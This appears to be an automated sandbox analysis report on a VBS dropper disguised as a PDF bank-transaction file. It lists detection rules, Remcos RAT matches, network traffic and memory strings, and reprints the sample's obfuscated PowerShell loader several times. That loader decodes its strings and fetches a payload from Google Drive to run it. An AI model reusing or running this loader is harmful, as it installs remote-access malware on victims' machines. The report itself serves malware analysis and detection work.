Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Hjkommisrs='Rakkerens';$Troublesome=${host}.Runspace;If ($Troublesome) {$Telephoning++;$Hjkommisrs+='Cacodorous';$Achyrodes='su';$Hjkommisrs+='Coruscate';$Achyrodes+='bs';$Hjkommisrs+='Tungusian';$Achyrodes+='tri';$Hjkommisrs+='Sonatinen';$Achyrodes+='ng';};Function Hammondorglets($Stavnen){$Vouchering=$Stavnen.Length-$Telephoning;For( $Svirrefluerne=5;$Svirrefluerne -lt $Vouchering;$Svirrefluerne+=6){$Ulceromembranous+=$Stavnen.$Achyrodes.'Invoke'( $Svirrefluerne, $Telephoning);}$Ulceromembranous;}function Markedsadgang($Diabolizing){ . ($Udglatter174) ($Diabolizing);}$Footslogging=Hammondorglets 'Di,boMI,trooKalorztausci ordtlHormelProseaB,gge/Feltr5 tim..Tegne0 Dm.n Baggr(GutwiWTmre iIul,snschrod He toEt.niwOb.igsCensu MedbyN InocTRdvin Derin1dorde0Tuber.Ersta0 Ch,f;P.arm NondiWHarstiUnsiznSpeed6Thorv4Tamil;M,gal Deco,xGeebu6heide4Misfo; Subs purtrProfivCrypt:Stork1 Evan2 Trep1Tilba.Fort 0Bogde)Piast BugtaGV skoe Skatc HandkMartyoSkavg/ Zai 2.lvia0Jazzh1Hukom0Ekspo0 B ni1Hasar0 Prie1Cacoe oldnFBis.aiKo sirSkareeFjolrf Uds oF,ugtxregio/ Doub1Cupre2 Okku1calip.indbj0Ve de ';$Uncoveredly=Hammondorglets 'DanneU manusRygerePuff.r ,lag-.riguA Sc pg T,umeTaramnProditMos k ';$Raasylte=Hammondorglets 'PsychhJomont G.smtImmovpChests Medd:Rub.i/Antia/ Obstd StjerSlanki Amylvf rmseAbbed..amesgWis,aoPorphoDk,drgSukatl Per eBorge. BrancFrekvoP.nkum Gimp/Progru UdvacKe sk?PetiteC irpxA elspAudi,ofa,igr Su gt gmnd=bochedGr peoDelsaw FejlnAdvanl XerooAntema.nseddBevge& nonliTabordFlubd= iorh1O chf2F.ndeyTs.tsWJustehEmbryD elytklserePForte2 StueA C,nf-And,rDIrr,t0Reinv-,lmmeP BeloYMist Y CallqC,clo5FladtcHvinty YatafVe,ruhInf.ueCirkuo C.gn3Li,deEO,lfopDeut,S.olmuePr.je_Ph.ll9K.ukaKSankt ';$Ceratitidae=Hammondorglets 'B vog> Stag ';$Udglatter174=Hammondorglets 'cedryiChaloeMididx Rat, ';$Unshrinkingly='Ubiquities';$Superfluity = Hammondorglets 'KneeleDor.oc D,odhLand,o Vat. Opti%Rigwia BaadpDok,op.hrondDrupea tetrtPennya forj% Agna\Hjt aDDi,kke,nsigpCo rarIbrugaCantovTnd.aeOverosAmi r.Unc mTM,ndeeMisk,r svin Togvo& Pseu&Setba LnposeIonizcForedhTus.aoPol s MacrtAksem ';Markedsadgang (Hammondorglets 'Salts$ ForlgBeslalComidoTwee.bAfr,kaForurlMealy: In.assa,rou DorsbFiksatVix,nr A.vroIvi.dpSkumliVal.ts mmorkWyteseLamesskafka=Snide(Gldelc,ennemUnderdNdlgn Ta,t/Sa,myc Bug. Erys$UdspiSUnrepuAphrapConc.e Chamr Hebrftressl Bilyu IndkiH.mentBlgety ndri)Fundi ');Markedsadgang (Hammondorglets ' P.gt$ Re rgbudgelU vikoRenprb Co,uaMavedlM nil:.altecNyskal MdeaoHloftc BetokUdforwObfusiBru ssFemkaeAtlan=Ude.u$PsaltRRoastaGenskaSebi,sKysery St,alLitretGapcheKo,em.ReagesTyponp.rotol udraifatt.t ewil(fyrst$f,ldeC .ndee ngenrUndera,mmettGymnaitero,tM,aneiWrongd Shera oreteBrtte)Galop ');Markedsadgang (Hammondorglets 'Tilbe[ SchlNWeigheAc uitVeget.mun.cSst,leeDeta.rC,llbvBaga,iIm,osc Fonde SacrPCosm,oIntimiKritinHorn tForesMVagt aIncubnClinoa bestg Neo.emostsrSudat]Bilic:Gapat:SamviSFrouneStikkcBorg

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\pko_trans_details_20240909_105339#U00b7pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\pko_trans_details_20240909_105339#U00b7pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\pko_trans_details_20240909_105339#U00b7pdf.vbs", ProcessId: 5660, ProcessName: wscript.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\pko_trans_details_20240909_105339#U00b7pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\pko_trans_details_20240909_105339#U00b7pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\pko_trans_details_20240909_105339#U00b7pdf.vbs", ProcessId: 5660, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Hjkommisrs='Rakkerens';$Troublesome=${host}.Runspace;If ($Troublesome) {$Telephoning++;$Hjkommisrs+='Cacodorous';$Achyrodes='su';$Hjkommisrs+='Coruscate';$Achyrodes+='bs';$Hjkommisrs+='Tungusian';$Achyrodes+='tri';$Hjkommisrs+='Sonatinen';$Achyrodes+='ng';};Function Hammondorglets($Stavnen){$Vouchering=$Stavnen.Length-$Telephoning;For( $Svirrefluerne=5;$Svirrefluerne -lt $Vouchering;$Svirrefluerne+=6){$Ulceromembranous+=$Stavnen.$Achyrodes.'Invoke'( $Svirrefluerne, $Telephoning);}$Ulceromembranous;}function Markedsadgang($Diabolizing){ . ($Udglatter174) ($Diabolizing);}$Footslogging=Hammondorglets 'Di,boMI,trooKalorztausci ordtlHormelProseaB,gge/Feltr5 tim..Tegne0 Dm.n Baggr(GutwiWTmre iIul,snschrod He toEt.niwOb.igsCensu MedbyN InocTRdvin Derin1dorde0Tuber.Ersta0 Ch,f;P.arm NondiWHarstiUnsiznSpeed6Thorv4Tamil;M,gal Deco,xGeebu6heide4Misfo; Subs purtrProfivCrypt:Stork1 Evan2 Trep1Tilba.Fort 0Bogde)Piast BugtaGV skoe Skatc HandkMartyoSkavg/ Zai 2.lvia0Jazzh1Hukom0Ekspo0 B ni1Hasar0 Prie1Cacoe oldnFBis.aiKo sirSkareeFjolrf Uds oF,ugtxregio/ Doub1Cupre2 Okku1calip.indbj0Ve de ';$Uncoveredly=Hammondorglets 'DanneU manusRygerePuff.r ,lag-.riguA Sc pg T,umeTaramnProditMos k ';$Raasylte=Hammondorglets 'PsychhJomont G.smtImmovpChests Medd:Rub.i/Antia/ Obstd StjerSlanki Amylvf rmseAbbed..amesgWis,aoPorphoDk,drgSukatl Per eBorge. BrancFrekvoP.nkum Gimp/Progru UdvacKe sk?PetiteC irpxA elspAudi,ofa,igr Su gt gmnd=bochedGr peoDelsaw FejlnAdvanl XerooAntema.nseddBevge& nonliTabordFlubd= iorh1O chf2F.ndeyTs.tsWJustehEmbryD elytklserePForte2 StueA C,nf-And,rDIrr,t0Reinv-,lmmeP BeloYMist Y CallqC,clo5FladtcHvinty YatafVe,ruhInf.ueCirkuo C.gn3Li,deEO,lfopDeut,S.olmuePr.je_Ph.ll9K.ukaKSankt ';$Ceratitidae=Hammondorglets 'B vog> Stag ';$Udglatter174=Hammondorglets 'cedryiChaloeMididx Rat, ';$Unshrinkingly='Ubiquities';$Superfluity = Hammondorglets 'KneeleDor.oc D,odhLand,o Vat. Opti%Rigwia BaadpDok,op.hrondDrupea tetrtPennya forj% Agna\Hjt aDDi,kke,nsigpCo rarIbrugaCantovTnd.aeOverosAmi r.Unc mTM,ndeeMisk,r svin Togvo& Pseu&Setba LnposeIonizcForedhTus.aoPol s MacrtAksem ';Markedsadgang (Hammondorglets 'Salts$ ForlgBeslalComidoTwee.bAfr,kaForurlMealy: In.assa,rou DorsbFiksatVix,nr A.vroIvi.dpSkumliVal.ts mmorkWyteseLamesskafka=Snide(Gldelc,ennemUnderdNdlgn Ta,t/Sa,myc Bug. Erys$UdspiSUnrepuAphrapConc.e Chamr Hebrftressl Bilyu IndkiH.mentBlgety ndri)Fundi ');Markedsadgang (Hammondorglets ' P.gt$ Re rgbudgelU vikoRenprb Co,uaMavedlM nil:.altecNyskal MdeaoHloftc BetokUdforwObfusiBru ssFemkaeAtlan=Ude.u$PsaltRRoastaGenskaSebi,sKysery St,alLitretGapcheKo,em.ReagesTyponp.rotol udraifatt.t ewil(fyrst$f,ldeC .ndee ngenrUndera,mmettGymnaitero,tM,aneiWrongd Shera oreteBrtte)Galop ');Markedsadgang (Hammondorglets 'Tilbe[ SchlNWeigheAc uitVeget.mun.cSst,leeDeta.rC,llbvBaga,iIm,osc Fonde SacrPCosm,oIntimiKritinHorn tForesMVagt aIncubnClinoa bestg Neo.emostsrSudat]Bilic:Gapat:SamviSFrouneStikkcBorg

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-09T08:55:34.222006+0200	2803270	2	Potentially Bad Traffic	192.168.2.7	49707	142.250.185.238	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Yara detected Remcos RAT

Source: Yara match	File source: 0000000F.00000002.1635549813.0000000006F35000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wab.exe PID: 7396, type: MEMORYSTR

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: unknown	HTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.7:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.7:49708 version: TLS 1.2

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic

Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49707 -> 142.250.185.238:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=12yWhDkP2A-D0-PYYq5cyfheo3EpSe_9K HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=12yWhDkP2A-D0-PYYq5cyfheo3EpSe_9K&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1JrUDq6Xrg7Tsx3kQRKkvvxtdk0y1VjAY HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1JrUDq6Xrg7Tsx3kQRKkvvxtdk0y1VjAY&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=12yWhDkP2A-D0-PYYq5cyfheo3EpSe_9K HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=12yWhDkP2A-D0-PYYq5cyfheo3EpSe_9K&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1JrUDq6Xrg7Tsx3kQRKkvvxtdk0y1VjAY HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1JrUDq6Xrg7Tsx3kQRKkvvxtdk0y1VjAY&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com

Source: powershell.exe, 0000000C.00000002.1618429477.0000000007210000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: powershell.exe, 0000000C.00000002.1618429477.0000000007272000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: wscript.exe, 00000000.00000003.1236596248.000002A084C47000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235733408.000002A084C47000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1236204508.000002A084C47000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000003.1256594972.000002A082C5E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1256830832.000002A082C6E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1256389650.000002A082C56000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1257244710.000002A082C6E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabH
Source: wscript.exe, 00000000.00000003.1256594972.000002A082C5E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1256830832.000002A082C6E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1256389650.000002A082C56000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1257244710.000002A082C6E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabe
Source: wscript.exe, 00000000.00000003.1256594972.000002A082C5E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1256830832.000002A082C6E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1256389650.000002A082C56000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1257244710.000002A082C6E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en5N
Source: wscript.exe, 00000000.00000003.1236386931.000002A084C38000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1236255670.000002A084C11000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?bf2b026eb2
Source: powershell.exe, 00000002.00000002.1728020389.000001BCCA27D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000002.00000002.1728020389.000001BCCA2B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://drive.usercontent.google.com
Source: powershell.exe, 00000002.00000002.1808446859.000001BCD84EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1616454793.0000000005946000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1616454793.0000000005809000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000C.00000002.1615676256.00000000048F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1728020389.000001BCC8481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1615676256.00000000047A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000C.00000002.1615676256.00000000048F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.1728020389.000001BCC8481000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000C.00000002.1615676256.00000000047A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000002.00000002.1728020389.000001BCCA2A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCC8921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCCA27D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCCA29F000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.1555754411.0000000006F6E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: powershell.exe, 0000000C.00000002.1616454793.0000000005809000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000C.00000002.1616454793.0000000005809000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000C.00000002.1616454793.0000000005809000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.1728020389.000001BCCA1BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.googPR
Source: powershell.exe, 00000002.00000002.1728020389.000001BCC86A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCCA1BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com
Source: powershell.exe, 00000002.00000002.1728020389.000001BCC86A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=12yWhDkP2A-D0-PYYq5cyfheo3EpSe_9KP
Source: powershell.exe, 0000000C.00000002.1615676256.00000000048F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=12yWhDkP2A-D0-PYYq5cyfheo3EpSe_9KXR
Source: wab.exe, 0000000F.00000002.1635549813.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1JrUDq6Xrg7Tsx3kQRKkvvxtdk0y1VjAY
Source: wab.exe, 0000000F.00000002.1635549813.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1JrUDq6Xrg7Tsx3kQRKkvvxtdk0y1VjAY0
Source: powershell.exe, 00000002.00000002.1728020389.000001BCCA2A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.googh
Source: powershell.exe, 00000002.00000002.1728020389.000001BCCA2A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCC8925000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com
Source: wab.exe, 0000000F.00000002.1635549813.0000000006F4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: wab.exe, 0000000F.00000002.1635549813.0000000006F4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/c
Source: powershell.exe, 00000002.00000002.1728020389.000001BCCA2A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCC8921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCC8925000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCCA27D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCCA29F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=12yWhDkP2A-D0-PYYq5cyfheo3EpSe_9K&export=download
Source: wab.exe, 0000000F.00000002.1635549813.0000000006F35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1JrUDq6Xrg7Tsx3kQRKkvvxtdk0y1VjAY&export=download
Source: powershell.exe, 0000000C.00000002.1615676256.00000000048F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1728020389.000001BCC9780000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.1808446859.000001BCD84EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1616454793.0000000005946000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1616454793.0000000005809000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.1728020389.000001BCCA2A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCC8921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCCA27D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCCA29F000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.1555754411.0000000006F6E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000002.00000002.1728020389.000001BCCA2A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCC8921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCCA27D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCCA29F000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.1555754411.0000000006F6E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000002.00000002.1728020389.000001BCCA2A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCC8921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCCA27D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCCA29F000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.1555754411.0000000006F6E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000002.00000002.1728020389.000001BCCA2A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCC8921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCCA27D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCCA29F000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.1555754411.0000000006F6E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000002.00000002.1728020389.000001BCCA2A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCC8921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCCA27D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCCA29F000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.1555754411.0000000006F6E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: unknown	HTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.7:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.7:49708 version: TLS 1.2

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 0000000F.00000002.1635549813.0000000006F35000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wab.exe PID: 7396, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi32_3452.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5504, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3452, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 7754
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 7754
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 7754	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 7754	Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Hjkommisrs='Rakkerens';$Troublesome=${host}.Runspace;If ($Troublesome) {$Telephoning++;$Hjkommisrs+='Cacodorous';$Achyrodes='su';$Hjkommisrs+='Coruscate';$Achyrodes+='bs';$Hjkommisrs+='Tungusian';$Achyrodes+='tri';$Hjkommisrs+='Sonatinen';$Achyrodes+='ng';};Function Hammondorglets($Stavnen){$Vouchering=$Stavnen.Length-$Telephoning;For( $Svirrefluerne=5;$Svirrefluerne -lt $Vouchering;$Svirrefluerne+=6){$Ulceromembranous+=$Stavnen.$Achyrodes.'Invoke'( $Svirrefluerne, $Telephoning);}$Ulceromembranous;}function Markedsadgang($Diabolizing){ . ($Udglatter174) ($Diabolizing);}$Footslogging=Hammondorglets 'Di,boMI,trooKalorztausci ordtlHormelProseaB,gge/Feltr5 tim..Tegne0 Dm.n Baggr(GutwiWTmre iIul,snschrod He toEt.niwOb.igsCensu MedbyN InocTRdvin Derin1dorde0Tuber.Ersta0 Ch,f;P.arm NondiWHarstiUnsiznSpeed6Thorv4Tamil;M,gal Deco,xGeebu6heide4Misfo; Subs purtrProfivCrypt:Stork1 Evan2 Trep1Tilba.Fort 0Bogde)Piast BugtaGV skoe Skatc HandkMartyoSkavg/ Zai 2.lvia0Jazzh1Hukom0Ekspo0 B ni1Hasar0 Prie1Cacoe oldnFBis.aiKo sirSkareeFjolrf Uds oF,ugtxregio/ Doub1Cupre2 Okku1calip.indbj0Ve de ';$Uncoveredly=Hammondorglets 'DanneU manusRygerePuff.r ,lag-.riguA Sc pg T,umeTaramnProditMos k ';$Raasylte=Hammondorglets 'PsychhJomont G.smtImmovpChests Medd:Rub.i/Antia/ Obstd StjerSlanki Amylvf rmseAbbed..amesgWis,aoPorphoDk,drgSukatl Per eBorge. BrancFrekvoP.nkum Gimp/Progru UdvacKe 